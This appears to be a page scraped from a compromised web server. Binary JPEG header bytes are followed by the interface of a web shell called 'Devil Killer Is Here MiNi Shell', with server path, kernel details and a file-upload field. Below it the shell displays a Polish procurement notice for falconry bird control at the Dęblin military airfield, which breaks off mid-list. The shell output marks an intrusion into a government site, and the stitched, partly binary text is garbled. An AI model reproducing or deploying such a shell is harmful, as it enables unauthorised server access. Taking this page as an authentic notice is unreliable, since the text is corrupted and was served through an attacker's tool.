JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231128/0051787901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Wykonywanie usługi monitorowania i ograniczania występowania ptaków i innych zwierząt bytujących na terenie lotniska w Dęblinie w 2024 roku” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">41. Baza Lotnictwa Szkolnego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 061456920</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Brygady Pościgowej 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dęblin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-521</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261518173</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">41blsz.przetargi@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.41blsz.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Wykonywanie usługi monitorowania i ograniczania występowania ptaków i innych zwierząt bytujących na terenie lotniska w Dęblinie w 2024 roku” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-db1262cb-8cf7-11ee-9fb5-3edbb70f45bd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00517879</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00012131/20/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.11 USŁUGI SOKOLNICZE</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/41blsz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002r o świadczeniu usług drogą elektroniczną (tj. Dz. U. z 2020r, poz. 344) za pośrednictwem Platformy Zakupowej pod adresem: https://portal.smartpzp.pl/41blsz <br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres e-mail: 41blsz.przetargi@ron.mil.pl, z zastrzeżeniem, że oferta musi wpłynąć na wskazaną powyżej Platformę Zakupową, a nie na wskazaną pocztę elektroniczną!<br/><br/>Zamawiający informuje, że poczta elektroniczna nie jest środkiem komunikacji do złożenia oferty, ponieważ istnieje obowiązek jej zaszyfrowania i uniemożliwienia otwarcia przez wyznaczonym terminem otwarcia ofert.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">11.	Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) - określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.: <br/>	posiadanie komputera o parametrach umożliwiających zainstalowanie następującego oprogramowania:<br/>•	w zakresie podstawowych funkcjonalności – przegląd, pobieranie i załączanie dokumentów: <br/>a)	Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM, procesor 1500 MHz lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 - Lub ich nowsze wersje <br/>b)	przeglądarka internetowa Mozilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera w ver. 58 i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11,<br/>c)	Lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox, Opera. Zalecane jest używanie najnowszych wersji przeglądarek <br/>•	w zakresie składania podpisu kwalifikowanego (za pośrednictwem platformy SmartPZP): <br/>a)	zainstalowane środowisko Java w wersji min. 1.8 (jre) <br/>b)	w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki Szafir SDK Web <br/>c)	oprogramowania SzafirHost w systemie operacyjnym. <br/><br/>Proces składania oferty lub wniosku przez Wykonawcę na platformie SmartPZP odbywa się w ciągu jednej sesji przeglądarki! Nie można zapisać wprowadzonych danych lub załączników i powrócić do składania oferty lub wniosku w późniejszym terminie.<br/><br/>Instrukcja instalowania oprogramowania wskazanego w punktach a, b i c powyżej znajduje się w Systemie w zakładce E-learning.<br/>13.	Maksymalny rozmiar pojedynczych plików przesyłanych za pośrednictwem Systemu wynosi 100 MB. Za pośrednictwem Systemu można przesłać wiele pojedynczych plików lub plik skompresowany do archiwum (ZIP) zawierający wiele pojedynczych plików. <br/><br/>14.	Dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w formatach .png, .jpg, .jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar, .txt, .ath, .xml, .dwg, .xades, .tar, .7z, .eml, .msg</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">6.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia 2016/679, zamawiający informuje, że: administratorem Pani/Pana danych osobowych jest: <br/>41. Baza Lotnictwa Szkolnego w Dęblinie <br/>ul. Brygady Pościgowej 5 <br/>08 – 521 Dęblin, <br/>NIP: 506-011-18-75, REGON: 061456920, <br/>kontakt: tel. 261 517 525, e-mail: 41blsz.przetargi@ron.mil.pl <br/>a)	kontakt do Inspektora ochrony danych osobowych Zamawiającego: tel. 261 518 821, e-mail: 41blsz.iod@ron.mil.pl ; <br/>b) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: „Wykonywanie usług monitorowania i ograniczania występowania ptaków i innych zwierząt bytujących na terenie lotniska w Dęblinie w 2024 roku” SPRAWA 66/23/P, prowadzonym w trybie podstawowym bez możliwości negocjacji, o wartości szacunkowej zamówienia poniżej progów unijnych w związku z art. 275 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (dalej „Pzp”); <br/>c)	w odniesieniu do danych osobowych osób fizycznych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; <br/>d)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp; Na podstawie art. 74 ust. 3 ustawy Pzp – w przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 rozporządzenia 2016/679, zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia. Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może naruszać integralności protokołu postępowania oraz jego załączników. <br/>e)	Pani/Pana dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia; a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>f)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>g)	posiada Pani/Pan: <br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących, <br/>	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*, <br/>	skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników <br/>Zgodnie z art. 19 ust. 2 ustawy Pzp skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą <br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO**; <br/>**prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego <br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 w RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego. <br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy osoba fizyczna uzna, że przetwarzanie danych osobowych jej dotyczących narusza przepisy RODO, <br/>h)	nie przysługuje Pani/Panu: <br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych, <br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, <br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">66/23/P</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest „Świadczenie usług monitorowania i ograniczania występowania ptaków i innych zwierząt bytujących na terenie lotniska w Dęblinie w 2024 roku”.<br/><br/>Realizacja zadań będących w zakresie przedmiotowej usługi, polegać będzie na przemieszczaniu się po terenie lotniska własnym środkiem transportu i na własny koszt. <br/><br/>Świadczenie niniejszej usługi ma na celu ograniczenie zagrożeń związanych <br/>z ryzykiem kolizji statków powietrznych z ptakami i innymi zwierzętami <br/>na terenie lotniska wojskowego w Dęblinie i ewentualnością nastąpienia w tych okolicznościach zdarzeń lotniczych, uwzględniając postanowienia zapisów ustawy z dnia 03.07.2002 r. Prawo lotnicze oraz ustawy z dnia 13.10.1995 r. Prawo łowieckie, ustawy z dnia 21.08.1997 r. o ochronie zwierząt a także wytycznych zawartych w Piśmie DG RSZ Nr 68320/DG/2/17 z dnia 14.11.2017 r. oraz Decyzji RDOŚ w Lublinie WPN.6401.119.2022.AO.1 z dnia 23 listopada 2022 roku.<br/><br/>Teren lotniska, w myśl art. 26 pkt 4) ustawy z dnia 13.10.1995r. Prawo łowieckie traktowany jest jako obiekt specjalny i nie wchodzi w skład obwodu łowieckiego.<br/>5.	Szczegółowy opis przedmiotu zamówienia oraz wymagania jakościowe znajdują się poniżej oraz w załącznikach do SWZ: <br/>a)	Załącznik Nr 1 do SWZ Formularz Ofertowy (załącznik Nr 1 do umowy)<br/>b)	Załącznik nr 1a do SWZ Szczegółowy Opis przedmiotu zamówienia – OPZ (załącznik Nr 2 do umowy), w którym zawarty jest m. in.: zakres usług, metody pracy, wykorzystanie gatunków ptaków; szczegółowe obowiązki wykonawcy, organizacja pracy w sytuacjach szczególnych itp.<br/>c)	Załącznik Nr 8 - Projektowane postanowienia umowy.<br/>6.	Wymagania dotyczące realizacji umowy, usług i gwarancji oraz kar umownych zawarte są w Załączniku nr 8 do SWZ- Projektowane postanowienia umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77600000-6 - Usługi myśliwskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert ważnych i wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą)<br/>1.	cena brutto (za ok. 12 miesięcy) za realizację usługi monitorowania i ograniczania występowania ptaków i innych zwierząt bytujących na terenie lotniska w Dęblinie	Waga kryterium- 60%	Maksymalna liczba punktów do uzyskania w danym kryterium- 60 punktów,<br/>2. „Czas reakcji” tj.: liczba godzin, jakie potrzebuje Wykonawca na przybycie na teren lotniska wojskowego w Dęblinie w sytuacji szczególnej i nieprzewidzianej, licząc od godziny przekazania informacji przez kontrolera lotniska o konieczności realizacji usługi płoszenia ptactwa w pełnych godzinach Waga kryterium- 40%, Maksymalna liczba punktów do uzyskania w danym kryterium- 40 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/><br/>2.1. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.<br/><br/>2.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający stawia szczególne wymagania w zakresie spełniania tego warunku.<br/>Warunek uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej zostanie spełniony, jeżeli Wykonawca wykaże, że posiada:<br/>a)	ważną Legitymację Polskiego Związku Łowieckiego wraz z dowodem opłaconych składek na cały okres trwania umowy, z ważnymi uprawnieniami sokolniczymi udokumentowanymi wpisem do wyżej wymienionej Legitymacji PZŁ (zgodnie z ustawą z dnia 13.10.1995r. Prawo łowieckie) dla 2 osób zgłoszonych do realizacji usługi płoszenia ptactwa i innych zwierząt. Przy czym co najmniej jedna z tych osób musi posiadać minimum roczne doświadczenie w świadczeniu usług odstraszania ptaków metodą sokolniczą na terenie lotnisk wojskowych lub cywilnych (potwierdzone referencjami w przypadku Wykonawcy lub jego oświadczeniem, że co najmniej 1 osoba u niego zatrudniona realizowała usługi płoszenia ptactwa metodą sokolniczą na lotniskach wojskowych lub cywilnych w okresie minimum 1 roku.<br/>b)	ważną Decyzję wydaną przez Ministra Środowiska na łowienie zwierzyny przy użyciu ptaka łowczego na podstawie ustawy z dnia 13.10.1995 r. Prawo łowieckie dla każdej ze zgłoszonych do realizacji umowy osób;<br/>c)	ważne zezwolenie na broń myśliwską wraz z zaświadczeniem o sprawności technicznej broni myśliwskiej.<br/><br/>2.3. Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.<br/>2.4. Zdolności technicznej lub zawodowej:<br/>Zamawiający stawia szczególne wymagania w zakresie spełniania tego warunku.<br/>Warunek zdolności zawodowej zostanie spełniony, jeżeli Wykonawca wykaże, że:<br/>a)	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał co najmniej 1 usługę o wartości nie mniejszej niż 180 000,00 zł brutto, obejmującą swym zakresem wykonywanie usług płoszenia ptactwa metodą sokolniczą na lotniskach cywilnych lub wojskowych wraz z podaniem jej wartości, opisu przedmiotu usługi, okresu wykonania i podmiotu na rzecz którego usługa została zrealizowana wraz z załączeniem dokumentu potwierdzającego, czy usługa jest lub została wykonana należycie;<br/>W przypadku wykazania kilku usług, każda z wymienionych w wykazie musi być udokumentowana, że została wykonana należycie;<br/><br/>Jedno zamówienie oznacza usługę wykonaną/wykonywaną na podstawie jednej umowy (1 zamówienie = 1 umowa). <br/><br/>Zamawiający nie dopuszcza sumowania wartości zrealizowanych usług w ramach kilku umów w celu uzyskania progu wartościowego (kwoty wymaganej przez Zamawiającego)<br/>b)	dysponuje co najmniej dwiema osobami posiadającymi uprawnienia sokolnicze (zgodnie z Ustawą z dnia 13.10.1995 r. Prawo łowieckie) posiadającymi ważne Legitymacje Polskiego Związku Łowieckiego, potwierdzające posiadanie przez te osoby uprawnień sokolniczych. W legitymacji tej winny być pieczątki potwierdzające opłacenie składek, Wykonawca musi posiadać ważną legitymację na cały okres świadczenia przedmiotowych usług. <br/>Przynajmniej jedna z osób posiadających uprawnienia sokolnicze musi posiadać co najmniej roczne doświadczenie w wykonywaniu usług odstraszania ptaków metodą sokolniczą na terenie lotnisk wojskowych lub cywilnych.<br/>Osoby posiadające uprawnienia sokolnicze muszą posiadać ważną decyzję wydaną przez Ministra Środowiska na łowienie zwierzyny przy użyciu ptaka łowczego na podstawie Ustawy z dnia 13.10.1995 r. – Prawo łowieckie;<br/><br/>Wykonawca wpisuje zadeklarowaną liczbę osób do Wykazu osób stanowiącego Załącznik Nr 10 do SWZ.<br/>Warunek zdolności technicznej zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje następującym potencjałem technicznym spełniającym minimalne warunki określone przez zamawiającego. Wykonawca musi wykazać się, że dysponuje:<br/>a)	co najmniej 1 samochodem przeznaczonym do przemieszczania się po/oraz poza terenem lotniska, przystosowany do przewożenia ptaków łowczych, ptaków schwytanych w za pomocą pułapek żywołownych oraz psów;<br/>b)	co najmniej jednym pistoletem hukowym;<br/>c)	środkami optycznymi, potrzebnymi do identyfikacji ptaków (lornetka);<br/>d)	od 4 do 8 